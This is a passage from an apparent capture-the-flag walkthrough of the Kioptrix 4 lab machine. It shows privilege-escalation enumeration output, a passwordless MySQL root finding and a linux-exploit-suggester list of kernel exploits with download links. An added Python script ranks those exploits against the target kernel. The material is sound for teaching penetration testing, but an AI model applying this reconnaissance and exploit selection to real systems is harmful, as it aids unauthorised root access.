drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 129 May 12 2009 standard
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
### NETWORKING ##########################################
[-] Network and IP info:
eth1 Link encap:Ethernet HWaddr 00:0c:29:ee:a1:97
inet addr:172.16.0.100 Bcast:172.16.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:899776 errors:136 dropped:244 overruns:0 frame:0
TX packets:611730 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:91501448 (87.2 MB) TX bytes:119399805 (113.8 MB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:400 (400.0 B) TX bytes:400 (400.0 B)
[-] ARP history:
? (172.16.0.24) at 28:56:5A:FF:4D:3F [ether] on eth1
? (172.16.0.1) at 0C:80:63:16:68:8E [ether] on eth1
[-] Nameserver(s):
nameserver 8.8.8.8
nameserver 8.8.4.4
[-] Default route:
default 172.16.0.1 0.0.0.0 UG 0 0 0 eth1
[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 172.16.0.100:22 172.16.0.24:46824 ESTABLISHED -
[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 172.16.0.100:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 172.16.0.100:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
### SERVICES #############################################
[-] Running processes:
klog 4676 0.0 0.1 3164 2036 ? Ss 12:25 0:00 /sbin/klogd -P /v
root 4695 0.0 0.0 5316 984 ? Ss 12:25 0:00 /usr/sbin/sshd
root 4751 0.0 0.0 1772 528 ? S 12:25 0:00 /bin/sh /usr/bin/
root 4793 0.0 1.7 128640 17636 ? Sl 12:25 0:04 /usr/sbin/mysqld
root 4795 0.0 0.0 1700 560 ? S 12:25 0:00 logger -p daemon.
root 4868 0.0 0.1 6528 1328 ? Ss 12:25 0:00 /usr/sbin/nmbd -D
root 4870 0.0 0.2 10108 2544 ? Ss 12:25 0:00 /usr/sbin/smbd -D
root 4878 0.0 0.0 10108 1024 ? S 12:25 0:00 /usr/sbin/smbd -D
root 4885 0.0 0.1 8084 1340 ? Ss 12:25 0:00 /usr/sbin/winbind
root 4887 0.0 0.1 8084 1160 ? S 12:25 0:00 /usr/sbin/winbind
daemon 4906 0.0 0.0 1984 420 ? Ss 12:25 0:00 /usr/sbin/atd
root 4917 0.0 0.0 2104 884 ? Ss 12:25 0:00 /usr/sbin/cron
root 4939 0.0 0.5 20464 6200 ? Ss 12:25 0:00 /usr/sbin/apache2
dhcp 4999 0.0 0.0 2440 772 ? Ss 12:25 0:00 dhclient eth1
root 5006 0.0 0.0 1716 492 tty1 Ss+ 12:25 0:00 /sbin/getty 38400
www-data 5066 0.0 0.5 20596 5640 ? S 12:33 0:01 /usr/sbin/apache2
root 5150 0.0 0.0 8084 868 ? S 12:33 0:00 /usr/sbin/winbind
root 5151 0.0 0.1 8092 1260 ? S 12:33 0:00 /usr/sbin/winbind
www-data 5221 0.0 0.5 20612 5692 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5222 0.0 0.5 20596 5628 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5223 0.0 0.5 20596 5604 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5225 0.0 0.5 20596 5648 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5226 0.0 0.5 20596 5612 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5233 0.0 0.5 20596 5612 ? S 12:53 0:00 /usr/sbin/apache2
www-data 5235 0.0 0.5 20612 5596 ? S 12:53 0:00 /usr/sbin/apache2
root 5530 0.0 0.3 11360 3720 ? Ss 13:29 0:00 sshd: john [priv]
john 5532 0.0 0.2 11868 2232 ? S 13:29 0:00 sshd: john@pts/0
john 5533 0.0 0.3 6016 3872 pts/0 Ss 13:29 0:00 python /bin/kshel
john 5540 0.0 0.0 0 0 pts/0 Z 13:29 0:00 [sh] <defunct>
john 5547 0.0 0.0 1772 484 pts/0 S 13:31 0:00 sh -c /bin/bash
john 5548 0.0 0.2 5440 2880 pts/0 S 13:31 0:00 /bin/bash
john 5627 0.0 0.2 5448 2904 pts/0 S 13:37 0:00 /bin/bash
john 6648 0.0 0.1 2712 1356 pts/0 S 14:04 0:00 vim
john 6653 0.0 0.0 1772 496 pts/0 S 14:05 0:00 /bin/sh
john 6663 0.0 0.1 4248 1692 pts/0 S+ 14:08 0:00 /bin/bash ./linen
john 6664 0.5 0.1 4780 1524 pts/0 R+ 14:08 0:00 /bin/bash ./linen
john 6666 0.0 0.0 1712 504 pts/0 S+ 14:08 0:00 tee -a
john 6876 0.0 0.1 4780 1344 pts/0 R+ 14:08 0:00 /bin/bash ./linen
john 6877 0.0 0.0 2644 1008 pts/0 R+ 14:08 0:00 ps aux
[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 702160 May 12 2008 /bin/bash
-rwxr-xr-x 1 root root 48308 Apr 4 2008 /bin/dd
lrwxrwxrwx 1 root root 4 Feb 4 2012 /bin/sh -> dash
-rwxr-xr-x 1 root root 15168 Sep 26 2008 /sbin/getty
-rwxr-xr-x 1 root root 89604 Apr 11 2008 /sbin/init
-rwxr-xr-x 1 root root 23048 Nov 23 2007 /sbin/klogd
-rwxr-xr-x 1 root root 32080 Nov 23 2007 /sbin/syslogd
-rwxr-xr-x 1 root root 67608 Apr 14 2009 /sbin/udevd
-rwxr-xr-x 1 root root 348908 Jun 18 2009 /usr/sbin/apache2
-rwxr-xr-x 1 root root 16040 Feb 20 2007 /usr/sbin/atd
-rwxr-xr-x 1 root root 31904 May 12 2009 /usr/sbin/cron
-rwxr-xr-x 1 root root 7399552 Nov 14 2008 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 1077056 Mar 9 2009 /usr/sbin/nmbd
-rwxr-xr-x 1 root root 3874172 Mar 9 2009 /usr/sbin/smbd
-rwxr-xr-x 1 root root 375684 May 14 2008 /usr/sbin/sshd
[-] /etc/init.d/ binary permissions:
total 300
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 1335 Jan 23 2009 README
-rwxr-xr-x 1 root root 5736 Jun 18 2009 apache2
-rwxr-xr-x 1 root root 2653 May 6 2009 apparmor
-rwxr-xr-x 1 root root 969 Feb 20 2007 atd
-rwxr-xr-x 1 root root 3597 Jan 23 2009 bootclean
-rwxr-xr-x 1 root root 2121 Jan 23 2009 bootlogd
-rwxr-xr-x 1 root root 1768 Jan 23 2009 bootmisc.sh
-rwxr-xr-x 1 root root 3454 Jan 23 2009 checkfs.sh
-rwxr-xr-x 1 root root 10602 Jan 23 2009 checkroot.sh
-rwxr-xr-x 1 root root 6355 May 30 2007 console-screen.sh
-rwxr-xr-x 1 root root 1634 Nov 27 2008 console-setup
-rwxr-xr-x 1 root root 1761 May 12 2009 cron
-rwxr-xr-x 1 root root 1223 Jun 22 2007 dns-clean
-rwxr-xr-x 1 root root 7195 Sep 12 2008 glibc.sh
-rwxr-xr-x 1 root root 1228 Jan 23 2009 halt
-rwxr-xr-x 1 root root 909 Jan 23 2009 hostname.sh
-rwxr-xr-x 1 root root 4521 Sep 26 2008 hwclock.sh
-rwxr-xr-x 1 root root 4528 Sep 26 2008 hwclockfirst.sh
-rwxr-xr-x 1 root root 1376 Nov 27 2008 keyboard-setup
-rwxr-xr-x 1 root root 944 Jan 23 2009 killprocs
-rwxr-xr-x 1 root root 1729 Nov 23 2007 klogd
-rwxr-xr-x 1 root root 748 Jan 23 2006 loopback
-rwxr-xr-x 1 root root 1399 Oct 6 2008 module-init-tools
-rwxr-xr-x 1 root root 596 Jan 23 2009 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2430 Jan 23 2009 mountall.sh
-rwxr-xr-x 1 root root 1465 Jan 23 2009 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1544 Jan 23 2009 mountkernfs.sh
-rwxr-xr-x 1 root root 594 Jan 23 2009 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 1244 Jan 23 2009 mountoverflowtmp
-rwxr-xr-x 1 root root 3123 Jan 23 2009 mtab.sh
-rwxr-xr-x 1 root root 5755 Nov 14 2008 mysql
-rwxr-xr-x 1 root root 2515 Nov 14 2008 mysql-ndb
-rwxr-xr-x 1 root root 1905 Nov 14 2008 mysql-ndb-mgm
-rwxr-xr-x 1 root root 1772 Dec 3 2007 networking
-rwxr-xr-x 1 root root 2377 Oct 23 2007 pcmciautils
-rwxr-xr-x 1 root root 375 Oct 4 2007 pppd-dns
-rwxr-xr-x 1 root root 1261 Jul 10 2008 procps
-rwxr-xr-x 1 root root 7891 Jan 23 2009 rc
-rwxr-xr-x 1 root root 522 Jan 23 2009 rc.local
-rwxr-xr-x 1 root root 117 Jan 23 2009 rcS
-rwxr-xr-x 1 root root 692 Jan 23 2009 reboot
-rwxr-xr-x 1 root root 1000 Jan 23 2009 rmnologin
-rwxr-xr-x 1 root root 4945 Apr 10 2008 rsync
-rwxr-xr-x 1 root root 2663 Mar 9 2009 samba
-rwxr-xr-x 1 root root 1199 Jan 23 2009 sendsigs
-rwxr-xr-x 1 root root 585 Jan 23 2009 single
-rwxr-xr-x 1 root root 4215 Jan 23 2009 skeleton
-rwxr-xr-x 1 root root 3840 Feb 5 2012 ssh
-rwxr-xr-x 1 root root 510 Jan 23 2009 stop-bootlogd
-rwxr-xr-x 1 root root 647 Jan 23 2009 stop-bootlogd-single
-rwxr-xr-x 1 root root 3343 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 2488 Apr 14 2009 udev
-rwxr-xr-x 1 root root 706 Apr 14 2009 udev-finish
-rwxr-xr-x 1 root root 7239 Jan 20 2009 ufw
-rwxr-xr-x 1 root root 4030 Jan 23 2009 umountfs
-rwxr-xr-x 1 root root 1833 Jan 23 2009 umountnfs.sh
-rwxr-xr-x 1 root root 1863 Jan 23 2009 umountroot
-rwxr-xr-x 1 root root 1815 Jan 23 2009 urandom
-rwxr-xr-x 1 root root 2445 Jan 23 2009 waitnfs.sh
-rwxr-xr-x 1 root root 1224 Mar 9 2009 winbind
-rwxr-xr-x 1 root root 1626 Mar 12 2008 wpa-ifupdown
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.9p10
[-] MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
[+] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5.4
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 1 hour 42 min 49 sec
Threads: 1 Questions: 6140 Slow queries: 0 Opens: 26 Flush tables: 1 Open tables: 20 Queries per second avg: 0.995
[-] Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built: Jun 18 2009 08:47:00
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/netcat
/usr/bin/wget
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1145 Feb 4 2012 /etc/passwd
-rw-r--r-- 1 root root 827 Feb 4 2012 /etc/group
-rw-r--r-- 1 root root 497 Feb 4 2012 /etc/profile
-rw-r----- 1 root shadow 855 Feb 5 2012 /etc/shadow
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 0 Feb 4 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 2401 Feb 4 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 2975 Feb 4 2012 /etc/adduser.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 599 Oct 9 2008 /etc/logrotate.conf
-rw-r--r-- 1 root root 34 Feb 4 2012 /etc/ld.so.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 2407 Feb 4 2012 /etc/lshell.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 2689 Sep 12 2008 /etc/gai.conf
-rw-r--r-- 1 root root 342 Feb 4 2012 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 57 Nov 30 13:22 /etc/resolv.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 552 May 16 2008 /etc/pam.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 240 Feb 4 2012 /etc/kernel-img.conf
[-] Current user's history files:
-rw------- 1 john john 61 Feb 4 2012 /home/john/.bash_history
[+] Root's history files are accessible!
-rw------- 1 root root 59 Feb 6 2012 /root/.bash_history
-rw------- 1 root root 1 Feb 5 2012 /root/.mysql_history
-rw------- 1 root root 5 Feb 6 2012 /root/.nano_history
[-] Location and contents (if accessible) of .bash_history file(s):
/home/john/.bash_history
exit
sudo su
clear
ls
cd /home/loneferret
ls
./nc
rm nc
exit
/home/loneferret/.bash_history
[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Feb 4 2012 .
drwxr-xr-x 14 root root 4096 Feb 4 2012 ..
### SCAN COMPLETE ####################################
Since Linux Exploit Suggester could not be run on the compromised target itself, I found that it can be run from the attacking machine instead: its --uname option takes the target's kernel string, obtained on the box with uname -a. In this mode the tool only sees the kernel version and architecture; the distribution, package list and CONFIG_*/sysctl checks that a local run would add all show as N/A, so the matching below is done on the kernel version alone.
$ ./linux-exploit-suggester.sh --uname "Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux"
Available information:
Kernel version: 2.6.24
Architecture: i686
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): N/A
Package listing: N/A
Searching among:
72 kernel space exploits
0 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: less probable
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: less probable
Tags: ubuntu=10.04
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: less probable
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-1146] reiserfs
Details: https://www.exploit-db.com/exploits/12130/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://www.exploit-db.com/download/12130
[+] [CVE-2009-3547] pipe.c 3
Details: https://www.exploit-db.com/exploits/10018/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/10018
[+] [CVE-2009-3547] pipe.c 2
Details: https://www.exploit-db.com/exploits/33322/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33322
[+] [CVE-2009-3547] pipe.c 1
Details: https://www.exploit-db.com/exploits/33321/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33321
[+] [CVE-2009-2692] sock_sendpage (simple version)
Details: https://www.exploit-db.com/exploits/9479/
Exposure: less probable
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Download URL: https://www.exploit-db.com/download/9479
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage (ppc)
Details: https://www.exploit-db.com/exploits/9545/
Exposure: less probable
Tags: ubuntu=8.10,RHEL=4|5
Download URL: https://www.exploit-db.com/download/9545
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage
Details: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
Exposure: less probable
Tags: ubuntu=9.04
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage3
Details: https://www.exploit-db.com/exploits/9641/
Exposure: less probable
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage2
Details: https://www.exploit-db.com/exploits/9436/
Exposure: less probable
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
[+] [CVE-2008-0600] vmsplice2
Details: https://www.exploit-db.com/exploits/5093/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/5093
[+] [CVE-2008-0600] vmsplice1
Details: https://www.exploit-db.com/exploits/5092/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/5092
That is a long list: the tool compared the kernel against its 72 kernel-space exploits and flagged 21 of them, all but the two Dirty COW entries as "less probable". Since it had no distribution or package data, these are kernel-version matches only and many will be false positives; each candidate's Tags and Comments (for example the mmap_min_addr requirement on the sock_sendpage entries) still have to be checked against the target before trying it.
Another tool I used to help with privilege escalation was linuxprivchecker.py:
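A triage step worth adding at this point (my own example code, not from the writeup and not part of linux-exploit-suggester): parse the "[+] [CVE] name" blocks LES prints, test each entry's "{kernel:...}" tag pattern against the target's uname -r string, and sort the candidates into match / unknown / excluded buckets before compiling anything. The sample input is a constructed excerpt of the output above with the tags copied verbatim; how the tag patterns are interpreted (literal dots, "*" as wildcard, "|" alternation) is my assumption about the LES tag syntax, the file name les_triage.py is hypothetical, and distro filtering is optional because the run above had no distribution information.

```python
"""Triage linux-exploit-suggester output against a target kernel release.
Added example, not code from the writeup or from the LES project."""
import re
import sys
from dataclasses import dataclass, field

# Constructed excerpt of the LES run shown above (tags copied verbatim),
# embedded so the script runs offline; pipe real LES output on stdin instead.
SAMPLE_OUTPUT = """\
[+] [CVE-2016-5195] dirtycow
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
[+] [CVE-2016-5195] dirtycow 2
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
[+] [CVE-2017-6074] dccp
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2013-0268] msr
Exposure: less probable
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
[+] [CVE-2009-2692] sock_sendpage (simple version)
Exposure: less probable
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
"""

EXPOSURE_RANK = {"highly probable": 0, "probable": 1, "less probable": 2}
HEADER_RE = re.compile(r"\[\+\] \[([^\]]+)\] (.+)")
TAG_RE = re.compile(r"^(\w+)=([^{]+)(?:\{kernel:([^}]+)\})?$")


@dataclass
class Candidate:
    cves: str
    name: str
    exposure: str = ""
    tags: list = field(default_factory=list)  # raw "distro=ver{kernel:pat}" strings
    comments: str = ""


def parse_les(text):
    """One Candidate per '[+] [CVE-...] name' header; 'Key: value' lines fill it."""
    cands, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:
            cur = Candidate(cves=m.group(1), name=m.group(2).strip())
            cands.append(cur)
        elif cur is not None and ":" in line:
            key, val = (s.strip() for s in line.split(":", 1))
            if key == "Exposure":
                cur.exposure = val
            elif key == "Tags":
                cur.tags = [t for t in val.split(",") if t]
            elif key == "Comments":
                cur.comments = val
    return cands


def tag_matches(tag, kernel, distro=None):
    """True: the tag's kernel pattern fits `kernel`. False: it does not.
    None: nothing checkable (distro-only tag, another distro, or unparseable)."""
    m = TAG_RE.match(tag)
    if not m or m.group(3) is None or (distro and m.group(1).lower() != distro.lower()):
        return None
    # Assumption about LES tag syntax: '.' is literal, '*' is a wildcard and
    # '(a|b)' / 'x|y' are alternations; the whole release string must match.
    regex = m.group(3).replace(".", r"\.").replace("*", ".*")
    return re.fullmatch(regex, kernel) is not None


def triage(text, kernel, distro=None):
    """Bucket candidates: 'match' (some kernel tag fits), 'excluded' (every
    checkable tag carries a kernel pattern and none fits), 'unknown' (no tags,
    or only tags that cannot be checked). Buckets are sorted by LES exposure."""
    buckets = {"match": [], "unknown": [], "excluded": []}
    for c in parse_les(text):
        verdicts = [tag_matches(t, kernel, distro) for t in c.tags]
        if any(v is True for v in verdicts):
            buckets["match"].append(c)
        elif verdicts and all(v is False for v in verdicts):
            buckets["excluded"].append(c)
        else:
            buckets["unknown"].append(c)
    for b in buckets.values():
        b.sort(key=lambda c: EXPOSURE_RANK.get(c.exposure, 9))
    return buckets


if __name__ == "__main__":
    kernel = sys.argv[1] if len(sys.argv) > 1 else "2.6.24-24-server"
    text = SAMPLE_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    for bucket, cands in triage(text, kernel).items():
        print(f"== {bucket} ({len(cands)})")
        for c in cands:
            print(f"  [{c.exposure}] {c.name} ({c.cves}) {c.comments}")
```

Run it on a real listing with `./linux-exploit-suggester.sh --uname "<target uname -a>" | python3 les_triage.py 2.6.24-24-server`. Untagged or distro-only entries (msr, sock_sendpage) stay in "unknown" rather than being dropped, since a missing tag says nothing about the target; their Comments field, such as the mmap_min_addr requirement, is the next thing to verify on the box. Passing distro="ubuntu" makes the RHEL-only kernel tag on the Dirty COW entry stop counting as a match, which is why that entry moves to "unknown" when the distribution is known.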
$ ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
[+] Hostname
Kioptrix4
[+] Operating System
Welcome to LigGoat Security Server
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth1 Link encap:Ethernet HWaddr 00:0c:29:ee:a1:97
inet addr:172.16.0.100 Bcast:172.16.0.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feee:a197/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:907204 errors:136 dropped:0 overruns:0 frame:0
TX packets:618381 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:92158617 (87.8 MB) TX bytes:120824256 (115.2 MB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:400 (400.0 B) TX bytes:400 (400.0 B)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 172.16.0.100:22 172.16.0.24:46824 ESTABLISHED -
udp 0 0 172.16.0.100:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
